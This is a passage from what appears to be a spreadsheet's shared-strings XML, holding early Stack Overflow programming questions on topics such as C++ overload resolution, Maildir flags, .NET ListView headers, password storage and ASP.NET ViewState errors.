  </si>
  <si>
    <t>What is a good regression testing framework for software applications?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Am looking for a regression test framework where I can add tests to.. Tests could be any sort of binaries that poke an application..&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are there any noted differences in appearance rendering of html and xhtml in Google Chrome from other browsers?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Are there any noted differences in appearance rendering of html and xhtml in Google Chrome from Firefox? From IE? From other browsers/what browser does it render the code the most similar to?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hidden Markov Models</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to get started on HMM's, but don't know how to go about it. Can people here, give me some basic pointers, where to look?&lt;/p&gt;
&lt;p&gt;More than just the theory, I like to do a lot of hands-on. So, would prefer resources, where I can write small code snippets to check my learning, rather than just dry text.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>visually customize autocomplete in Wicket</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I visually customize autocomplete fields in Wicket (change colors, fonts, etc.)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What do the flags in a Maildir message filename mean?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm cleaning up some old Maildir folders, and finding messages with names like:&lt;/p&gt;
&lt;p&gt;1095812260.M625118P61205V0300FF04I002DC537_0.redoak.cise.ufl.edu,S=2576:2,ST&lt;/p&gt;
&lt;p&gt;They don't show up in my IMAP client, so I presume there's some semaphore indicating the message already got moved somewhere else. Is that the case, and can the files be deleted without remorse?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What attributes help runtime .Net performance?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for attributes I can use to ensure the best runtime performance for my .Net application by giving hints to the loader, JIT compiler or ngen.&lt;/p&gt;
&lt;p&gt;For example we have &lt;a href="http://msdn.microsoft.com/en-us/library/k2wxda47.aspx"&gt;DebuggableAttribute&lt;/a&gt; which should be set to not debug and not disable optimization for optimal performance.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[Debuggable(false, false)]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Are there any others I should know about?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>In a client-server application: How to send to the DB the user's application password?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an Java desktop application wich connects directly with the DB (an Oracle). The application has multiple user accounts. What is the correct method to send the user's password (not DB password) over the network? I don't want to send it in plain text&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it worth encrypting email addresses in the database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm already using &lt;a href="http://www.matasano.com/log/958/enough-with-the-rainbow-tables-what-you-need-to-know-about-secure-password-schemes/"&gt;salted hashing&lt;/a&gt; to store passwords in my database, which means that I should be immune to &lt;a href="http://en.wikipedia.org/wiki/Rainbow_table"&gt;rainbow table&lt;/a&gt; attacks.&lt;/p&gt;
&lt;p&gt;I had a thought, though: what if someone does get hold of my database? It contains the users' email addresses. I can't really hash these, because I'll be using them to send notification emails, etc..&lt;/p&gt;
&lt;p&gt;Should I encrypt them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can we achieve 100% decoupling?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can we achieve 100% decoupling between components of a system or different systems that communicate with each other? I don't think its possible. If two systems communicate with each other then there should be some degree of coupling between them. Am I right?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I compare phrases for similarity?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When entering a question, stackoverflow presents you with a list of questions that it thinks likely to cover the same topic. I have seen similar features on other sites or in other programs, too (Help file systems, for example), but I've never programmed something like this myself. Now I'm curious to know what sort of algorithm one would use for that.&lt;/p&gt;
&lt;p&gt;The first approach that comes to my mind is splitting the phrase into words and look for phrases containing these words. Before you do that, you probably want to throw away insignificant words (like 'the', 'a', 'does' etc), and then you will want to rank the results.&lt;/p&gt;
&lt;p&gt;Hey, wait - let's do that for web pages, and then we can have a ... watchamacallit ... -  a "search engine", and then we can sell ads, and then ...&lt;/p&gt;
&lt;p&gt;No, seriously, what are the common ways to solve this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Logging image downloads</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to find a way of finding out who is downloading what image from an image gallery. Users can download using a button beside the thumbnail or right click and use the "save link as" Is it possible to relate a user session or ID to a "save link as" action from all browsers using either PHP or JavaScript.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is this strange C code format?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What advantage, if any, is provided by formatting C code as follows:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while(lock_file(lockdir)==0)
    {
    count++;
    if(count==20)
        {
        fprintf(stderr,"Can't lock dir %s\n",lockdir);
        exit(1);
        }
    sleep(3);
    }
if(rmdir(serverdir)!=0)
    {
    switch(errno)
        {
        case EEXIST:
            fprintf(stderr,"Server dir %s not empty\n",serverdir);
            break;
        default:
            fprintf(stderr,"Can't delete dir %s\n",serverdir);
        }
    exit(1);
    }
unlock_file(lockdir);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;versus something more typical such as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;while(lock_file(lockdir)==0) {
    count++;
    if(count==20) {
        fprintf(stderr,"Can't lock dir %s\n",lockdir);
        exit(1);
    }
    sleep(3);
}
if(rmdir(serverdir)!=0) {
    switch(errno) {
        case EEXIST:
            fprintf(stderr,"Server dir %s not empty\n",serverdir);
            break;
        default:
            fprintf(stderr,"Can't delete dir %s\n",serverdir);
    }
    exit(1);
}
unlock_file(lockdir);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I just find the top version difficult to read and to get the indenting level correct for statements outside of a long block, especially for longs blocks containing several nested blocks.&lt;/p&gt;
&lt;p&gt;Only advantage I can see is just to be different and leave your fingerprints on code that you've written.&lt;/p&gt;
&lt;p&gt;I notice vim formatting would have to be hand-rolled to handle the top case.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>deleting a buffer through a different type of pointer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I have the following C++:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;char *p = new char[cb];
SOME_STRUCT *pSS = (SOME_STRUCT *) p;
delete pSS;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is this safe according to the C++ standard? Do I need to cast back to a &lt;code&gt;char*&lt;/code&gt; and then use &lt;code&gt;delete[]&lt;/code&gt;? I know it'll work in most C++ compilers, because it's plain-ordinary-data, with no destructors. Is it guaranteed to be safe?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Extracting text from a PDF using JBoss Richfaces</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to write a web-app to manage references for my PhD thesis.&lt;/p&gt;
&lt;p&gt;I used to manage this information inside a personal Confluence (fantastic tool! - &lt;a href="http://www.atlassian.com/software/confluence/" rel="nofollow"&gt;http://www.atlassian.com/software/confluence/&lt;/a&gt;) instance however I'm fed-up with the opening of PDF's and cutting and pasting values into fields that I wish to record.&lt;/p&gt;
&lt;p&gt;I have exposed a webservice that will return me images based on a PDF filename and a page number. The same webservice also exposes a method that will return the text inside of a provided rectangle (top left x-y coord, bottom right x-y coord).&lt;/p&gt;
&lt;p&gt;I would like to be able to drag a rectangle over part of the PDF image and then call the webservice to give me the text (which I will then store on a EntityBean). I am looking at using the JBoss application stack (Application Server, Hibernate, Seam and Richfaces). Does anybody know how I could go about achieving this? I have seen the ability to draw custom images in other RIA toolkits (e.g. dojo), but I can't see a way of doing this inside of Richfaces.&lt;/p&gt;
&lt;p&gt;Hopefully somebody out there could prove me wrong, or provide some idea about what I can do (as I am not a web developer - I'm mainly building this tool because the RIA frameworks available now have got me interested!)&lt;/p&gt;
&lt;p&gt;I already have the code to extract the text, my problem is purely how can I get the user to draw a "selection rectangle" inside the web browser over the top of the image?&lt;/p&gt;
&lt;p&gt;Many Thanks,&lt;/p&gt;
&lt;p&gt;Aidos&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Help in creating Zip files from .Net and reading them from Java</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a Zip file from .Net that can be read from Java code.&lt;/p&gt;
&lt;p&gt;I've used SharpZipLib to create the Zip file but also if the file generated is valid according to the CheckZip function of the #ZipLib library and can be successfully uncompressed via WinZip or WinRar I always get an error when trying to uncompress it using the Java.Utils.Zip class in Java.&lt;/p&gt;
&lt;p&gt;Problem seems to be in the wrong header written by SharpZipLib, I've also posted a question on the SharpDevelop forum but with no results (see &lt;a href="http://community.sharpdevelop.net/forums/t/8272.aspx" rel="nofollow"&gt;http://community.sharpdevelop.net/forums/t/8272.aspx&lt;/a&gt; for info) but with no result.&lt;/p&gt;
&lt;p&gt;Has someone a code sample of compressing a Zip file with .Net and de-compressing it with the Java.Utils.Zip class?&lt;/p&gt;
&lt;p&gt;Regards
Massimo&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Can I add maven repositories in the command line?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm aware I can add maven repositories for fetching dependencies in ~/.m2/settings.xml. But is it possible to add a repository using command line, something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mvn install -Dmaven.repository=http://example.com/maven2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The reason I want to do this is because I'm using a continuous integration tool where I have full control over the command line options it uses to call maven, but managing the settings.xml for the user that runs the integration tool is a bit of a hassle.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Tool to test Website accessibility</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can you suggest a tool for testing accessibility and section 508/ADA compliance of a Website with MS Share Point and .Net 2.0 as the underlying platform?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I find last row that contains data in the Excel sheet with a macro?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I find the last row that contains data in a specific column and on a specific sheet?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Set a UserControl Property to Not Show Up in VS Properties Window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a UserControl in my Asp.net project that has a public property. I do not want this property to show up in the Visual Studio Property Window when a user highlights an instance of the UserControl in the IDE. What attribute (or other method) should I use to prevent it from showing up?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class MyControl : System.Web.UI.UserControl {
  // Attribute to prevent property from showing in VS Property Window?
  public bool SampleProperty { get; set; }
  // other stuff
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to display the progress of a server script in jQuery?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;With this code I can show an animated gif while the server script is running:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;function calculateTotals() {
    $('#results').load('getResults.php', null, showStatusFinished);
    showLoadStatus();
}
function showLoadStatus() {
    $('#status').html('');
}
function showStatusFinished() {
    $('#status').html('Finished.');
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, I would like to display a status of how far along the script is, e.g. "Processing line 342 of 20000..." and have it count up until it is finished.&lt;/p&gt;
&lt;p&gt;How can I do that? I can make a server-script which constantly contains the updated information but where do I put the command to read this, say, every second?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I make the lights stay fixed in the world with Direct3D</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been using OpenGL for years, but after trying to use D3D for the first time, I wasted a significant amount of time trying figure out how to make my scene lights stay fixed in the world rather than fixed on my objects.&lt;/p&gt;
&lt;p&gt;In OpenGL light positions get transformed just like everything else with the MODELVIEW matrix, so to get lights fixed in space, you set up your MODELVIEW the way you want for the lights, and call glLightPosition then set it up for your geometry and make geometry calls.   In D3D that doesn't help.&lt;/p&gt;
&lt;p&gt;(Comment -- I eventually figured out the answer to this one, but I couldn't find anything helpful on the web or in the MSDN.  It would have saved me a few hours of head scratching if I could have found this answer then.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java Applet crashes .NET Webbrowsercontrol</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;in our application we have a Java applet running inside a .NET browser control. It is a know issue from Sun that running an applet this way may crash the control.&lt;/p&gt;
&lt;p&gt;Has anyone come across the same problem and solved it?&lt;/p&gt;
&lt;p&gt;Atm we are running the applet in a Webbrowser but we need to run it in a browser control.&lt;/p&gt;
&lt;p&gt;Thx for any help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Determine the size of a pipe without calling read()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need a function called SizeOfPipe() which should return the size of a pipe- I only want to know how much data is in the pipe and not actually read data off the pipe itself. &lt;/p&gt;
&lt;p&gt;I thought the following code would work&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;fseek (pPipe, 0 , SEEK_END);
*pBytes = ftell (pPipe);
rewind (pPipe);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but fseek dosent work on file descriptors. Another option would be to read the pipe then write the data back but would like to avoid this if possibe, any suggestions ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to implement a Digg-like algorithm?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How to implement a website with a recommendation system similar to stackoverflow/digg/reddit? I.e., users submit content and the website needs to calculate some sort of "hotness" according to how popular the item is. The flow is as follows:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Users submit content&lt;/li&gt;
&lt;li&gt;Other users view and vote on the content (assume 90% of the users only views content and 10% actively votes up or down on content)&lt;/li&gt;
&lt;li&gt;New content is continuously submitted&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;How do I implement an algorithm that calculates the "hotness" of a submitted item, preferably in real-time? Are there any best-practices or design patterns?&lt;/p&gt;
&lt;p&gt;I would assume that the algorithm takes the following into consideration:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;When an item was submitted&lt;/li&gt;
&lt;li&gt;When each vote was cast&lt;/li&gt;
&lt;li&gt;When the item was viewed&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;E.g. an item that gets a constant trickle of votes would stay somewhat "hot" constantly while an item that receives a burst of votes when it is first submitted will jump to the top of the "hotness"-list but then fall down as the votes stop coming in.&lt;/p&gt;
&lt;p&gt;(I am using a MySQL+PHP but I am interested in general design patterns).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you efficiently copy BSTR to wchar_t[]?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a BSTR object that I would like to convert to copy to a wchar__t object. The tricky thing is the length of the BSTR object could be anywhere from a few kilobytes to a few hundred kilobytes. Is there an efficient way of copying the data across? I know I could just declare a wchar_t array and alway allocate the maximum possible data it would ever need to hold. However, this would mean allocating hundreds of kilobytes of data for something that potentially might only require a few kilobytes. Any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ overload resolution</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given the following example, why do I have to explicitly use the statement &lt;code&gt;b-&amp;gt;A::DoSomething()&lt;/code&gt; rather than just &lt;code&gt;b-&amp;gt;DoSomething()&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;Shouldn't the compiler's overload resolution figure out which method I'm talking about?&lt;/p&gt;
&lt;p&gt;I'm using Microsoft VS 2005. (Note: using virtual doesn't help in this case.)&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class A
{
  public:
    int DoSomething() {return 0;};
};
class B : public A
{
  public:
    int DoSomething(int x) {return 1;};
};
int main()
{
  B* b = new B();
  b-&amp;gt;A::DoSomething();    //Why this?
  //b-&amp;gt;DoSomething();    //Why not this? (Gives compiler error.)
  delete b;
  return 0;
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Problem with SET FMTONLY ON</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm executing stored procedures using SET FMTONLY ON, in order to emulate what our code generator does.  However, it seems that the results are cached when executed like this, as I'm still getting a &lt;em&gt;Conversion failed&lt;/em&gt; error from a proc that I have just dropped! This happens even when I execute the proc without SET FMTONLY ON.&lt;/p&gt;
&lt;p&gt;Can anyone please tell me what's going on here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to implement "DOM Ready" event in a GreaseMonkey script?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to modify my GreaseMonkey script from firing on window.onload to window.DOMContentLoaded, but this event never fires.&lt;/p&gt;
&lt;p&gt;I'm using FireFox 2.0.0.16 / GreaseMonkey 0.8.20080609&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/59205/enhancing-stackoverflow-user-experience"&gt;This&lt;/a&gt; is the full script that I'm trying to modify, changing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;window.addEventListener ("load", doStuff, false);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;window.addEventListener ("DOMContentLoaded", doStuff, false);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Mocking constructors in Ruby</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm a Java-developer toying with Ruby, and loving it. I have understood that because of Ruby's metaprogramming facilities my unit-tests become much cleaner and I don't need nasty mocking frameworks. I have a class which needs the &lt;code&gt;File&lt;/code&gt; class's services and in my test I don't want to touch my real filesystem. In Java I would use some virtual file system for easier "seams" to pass fake-objects in but in Ruby that's obviously overkill. What I come up seems already really nice compared to the Java-world. In my class under test I have an optional constructor parameter: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def initialize(file_class=File)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I need to open files within my class, I can then do this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;@file_class.open(filename)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the call goes to either the real File-class, or in case of my unit-test, it goes to a fake-class which doesn't touch the filesystem. I know there must be a better way to do this with metaprogramming?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Call BizTalk Orchestration Dynamically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I call a BizTalk Orchestration dynamically knowing the Orchestration name? 
The call Orchestration shapes need to know the name and parameters of Orchestrations at design time. I've tried using 'call' XLang keyword but it also required Orchestration name as Design Time like in expression shape, we can write as &lt;/p&gt;
&lt;p&gt;call BizTalkApplication1.Orchestration1(param1,param2);&lt;/p&gt;
&lt;p&gt;I'm looking for some way to specify calling orchestration name, coming from the incoming message or from SSO config store.&lt;/p&gt;
&lt;p&gt;EDIT: I'musing BizTalk 2006 R1 (ESB Guidance is for R2 and I didn't get how it could solve my problem) &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to use the "is" operator in System.Type variables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;here is what a I'm doing:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;object ReturnMatch(System.Type type)  
{  
    foreach(object obj in myObjects)  
    {
        if (obj == type)  
        {  
            return obj;  
        }  
    }  
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, if obj is a subclass of &lt;code&gt;type&lt;/code&gt;, it will not match. But I would like the function to return the same way as if I was using the operator &lt;code&gt;is&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I tried the following, but it won't compile:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (obj is type) // won't compile in C# 2.0
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The best solution I came up with was:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (obj.GetType().Equals(type) || obj.GetType().IsSubclassOf(type))
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Isn't there a way to use operator &lt;code&gt;is&lt;/code&gt; to make the code cleaner?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Speech Recognition for Searching Files</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Here is the problem I have:&lt;/p&gt;
&lt;p&gt;I have a lot (tens of thousands) of mp3 files that my users would like to be able to search. Is there is software out there that you've used or heard good things about that would allow me to index that content and put it in a database so I can search on it later?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Storing content in multiple languages? E.g. English, French, German</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How should I store (and present) the text on a website intended for worldwide use, with several languages? The content is mostly in the form of 500+ word articles, although I will need to translate tiny snippets of text on each page too (such as "print this article" or "back to menu").&lt;/p&gt;
&lt;p&gt;I know there are several CMS packages that handle multiple languages, but I have to integrate with our existing ASP systems too, so I am ignoring such solutions.&lt;/p&gt;
&lt;p&gt;One concern I have is that Google should be able to find the pages, even for foreign users. I am less concerned about issues with processing dates and currencies.&lt;/p&gt;
&lt;p&gt;I worry that, left to my own devices, I will invent a way of doing this which work, but eventually lead to disaster! I want to know what professional solutions you have actually used on real projects, not untried ideas! Thanks very much.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;I looked at RESX files, but felt they were unsuitable for all but the most trivial translation solutions (I will elaborate if anyone wants to know).&lt;/p&gt;
&lt;p&gt;Google will help me with translating the text, but not storing/presenting it.&lt;/p&gt;
&lt;p&gt;Has anyone worked on a multi-language project that relied on their own code for presentation?&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Any thoughts on serving up content in the following ways, and which is best?&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.website.com/text/view.asp?id=12345&amp;amp;lang=fr" rel="nofollow"&gt;http://www.website.com/text/view.asp?id=12345&amp;amp;lang=fr&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://www.website.com/text/12345/bonjour_mes_amis.htm" rel="nofollow"&gt;http://www.website.com/text/12345/bonjour_mes_amis.htm&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://fr.website.com/text/12345" rel="nofollow"&gt;http://fr.website.com/text/12345&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;(these are not real URLs, i was just showing examples)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is a software token a valid second factor in multi-factor security?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are changing our remote log-in security process at my workplace, and we are concerned that the new system does not use &lt;a href="http://en.wikipedia.org/wiki/Two-factor_authentication" rel="nofollow"&gt;multi-factor authentication&lt;/a&gt; as the old one did. (We had been using RSA key-fobs, but they are being replaced due to cost.) The new system is an anti-phishing image system which has been misunderstood to be a two-factor authentication system. We are now exploring ways to continue providing multi-factor security without issuing hardware devices to the users.&lt;/p&gt;
&lt;p&gt;Is it possible to write a software-based token system to be installed on the user's PCs that would constitute a true second factor in a multi-factor authentication system? Would this be considered "something the user has", or would it simply be another form of "something the user knows"?&lt;/p&gt;
&lt;p&gt;Edit: &lt;em&gt;phreakre&lt;/em&gt; makes a good point about cookies. For the sake of this question, assume that cookies have been ruled out as they are not secure enough.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Making a C#/Winform application cross-platform - should I use AIR, Mono, or something else?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an app that I've written in C#/WinForms (&lt;a href="http://www.thekbase.com" rel="nofollow" title="TheKBase"&gt;my little app&lt;/a&gt;). To make it cross-platform, I'm thinking of redoing it in Adobe AIR. Are there any arguments in favor of WinForms as a cross-platform app? Is there a cross-platform future for Winforms (e.g., Mono, etc.)? Suggestions for cross-platform UI development?&lt;/p&gt;
&lt;p&gt;By cross-platform I mean, currently, Mac OSX, Windows and Linux.&lt;/p&gt;
&lt;p&gt;This question was &lt;a href="http://stackoverflow.com/questions/116468/winforms-for-mono-on-mac-linux-and-pc-redux"&gt;asked again and answered with better success&lt;/a&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Modal dialogs in IE gets hidden behind IE if user clicks on IE pane</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to write an applet that brings up a password dialog. The problem is that dialog is set to be always on top but when user clicks on IE window dialog gets hidden behind IE window nevertheless. And since dialog is modal and holds &lt;strong&gt;all&lt;/strong&gt; IE threads IE pane does not refresh and dialog window is still painted on top of IE (but not refreshed). This behaviour confuses users (they &lt;em&gt;see&lt;/em&gt; dialog on top of IE but it looks like it has hanged since it is not refreshe). &lt;/p&gt;
&lt;p&gt;So I need a way to keep that dialog on top of everything. But any other solution to this problem would be nice. &lt;/p&gt;
&lt;p&gt;Here's the code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;        PassDialog dialog = new PassDialog(parent);
        /* do some non gui related initialization */
        dialog.pack();
        dialog.setLocationRelativeTo(null);
        dialog.setAlwaysOnTop(true);
        dialog.setVisible(true);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Resolution: As @shemnon noted I should make a window instead of (null, Frame, Applet) parent of modal dialog. So good way to initlialize parent was: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;parent = javax.swing.SwingUtilities.getWindowAncestor(theApplet);
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I show scrollbars on a System.Windows.Forms.TextBox only when the text doesn't fit?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For a System.Windows.Forms.TextBox with Multiline=True, I'd like to only show the scrollbars when the text doesn't fit.&lt;/p&gt;
&lt;p&gt;This is a readonly textbox used only for display.  It's a TextBox so that users can copy the text out. Is there anything built-in to support auto show of scrollbars? If not, should I be using a different control? Or do I need to hook TextChanged and manually check  for overflow (if so, how to tell if the text fits?)&lt;/p&gt;
&lt;p&gt;&lt;hr/&gt;&lt;/p&gt;
&lt;p&gt;Not having any luck with various combinations of WordWrap and Scrollbars settings.  I'd like to have no scrollbars initially and have each appear dynamically only if the text doesn't fit in the given direction.&lt;/p&gt;
&lt;p&gt;&lt;hr/&gt;&lt;/p&gt;
&lt;p&gt;@&lt;a href="#89428"&gt;nobugz&lt;/a&gt;, thanks, that works when WordWrap is disabled. I'd prefer not to disable wordwrap, but it's the lesser of two evils.&lt;/p&gt;
&lt;p&gt;&lt;hr/&gt;&lt;/p&gt;
&lt;p&gt;@AndrÃ© Neves, good point, and I would go that way if it was user-editable.  I agree that consistency is the cardinal rule for UI intuitiveness.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox, saved passwords, and the change password dialogue</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If a user saves the password on the login form, ff3 is putting the saved password in the change password dialoge on the profile page, even though its &lt;strong&gt;not the same input name&lt;/strong&gt; as the login. how can I prevent this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is your choice for a Time Managment Solution?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've come across a few different applications that monitor my usage while on the computer, but what have you used, and like? whether it be writing down your activities in a composition notbook or install an app that reports silently to a server? what do you like?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to set the header sort glyph in a .NET ListView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I set the column which has the header sort glyph, and its direction, in a .NET 2.0 WinForms ListView?&lt;/p&gt;
&lt;h2&gt;Bump&lt;/h2&gt;
&lt;p&gt;The listview is .net is not a managed control, it is a very thin wrapper around the Win32 ListView common control. It's not even a very good wrapper - it doesn't expose all the features of the real listview.&lt;/p&gt;
&lt;p&gt;The Win32 listview common control supports drawing itself with themes. One of the themed elements is the header sort arrow. Windows Explorer's listview common control knows how to draw one of its columns with that theme element.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;does the Win32 listview support specifying which column has what sort order?  &lt;/li&gt;
&lt;li&gt;does the Win32 header control that the listview internally uses support specifying which column has what sort order?  &lt;/li&gt;
&lt;li&gt;does the win32 header control support custom drawing, so I can draw the header sort glyph myself?&lt;/li&gt;
&lt;li&gt;does the win32 listview control support custom header drawing, so I can draw the header sort glyph myself?&lt;/li&gt;
&lt;li&gt;does the .NET ListView control support custom header drawing, so I can draw the header sort glyph myself?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How to gracefully deal with ViewState errors?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm running some c# .net pages with various gridviews. If I ever leave any of them alone in a web browser for an extended period of time (usually overnight), I get the following error when I click any element on the page.&lt;/p&gt;
&lt;p&gt;I'm not really sure where to start dealing with the problem. I don't mind resetting the page if it's viewstate has expired, but throwing an error is unacceptable!&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  Error: The state information is invalid for this page and might be corrupted.
  Target: Void ThrowError(System.Exception, System.String, System.String, Boolean)
  Data: System.Collections.ListDictionaryInternal
  Inner: System.Web.UI.ViewStateException: Invalid viewstate. Client IP: 66.35.180.246 Port: 1799 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 ViewState: (**Very long Gibberish Omitted!**)
  Offending URL: (**Omitted**)
  Source: System.Web
  Message: The state information is invalid for this page and might be corrupted.
